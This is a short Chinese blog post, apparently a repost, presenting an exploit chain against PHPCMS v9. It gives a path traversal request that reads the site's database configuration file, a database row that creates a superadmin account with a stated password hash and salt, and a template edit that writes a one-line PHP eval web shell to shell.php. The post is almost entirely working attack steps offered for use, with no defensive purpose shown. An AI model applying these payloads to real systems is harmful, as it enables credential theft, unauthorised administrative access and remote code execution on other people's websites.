phpcmsV9最新任意读文件漏洞

  • A+
所属分类:漏洞时代
摘要

from:www.creturn.com powered by phpcms v9
[php]
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
[/php]
关于拿shell的

from:www.creturn.com

 

powered by phpcms v9
[php]
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
[/php]
关于拿shell的

 

开启外联的增加一条数据库

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:creturn.com的超级管理员

 

登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表

phpcmsV9最新任意读文件漏洞

然后点击里面的search目录下面的index.html右侧的编辑

phpcmsV9最新任意读文件漏洞

修改其模版为:

<?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

 

提交保存

然后访问:localhost/index.php?m=search

会在根目录生成一个shell.php的一句话

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: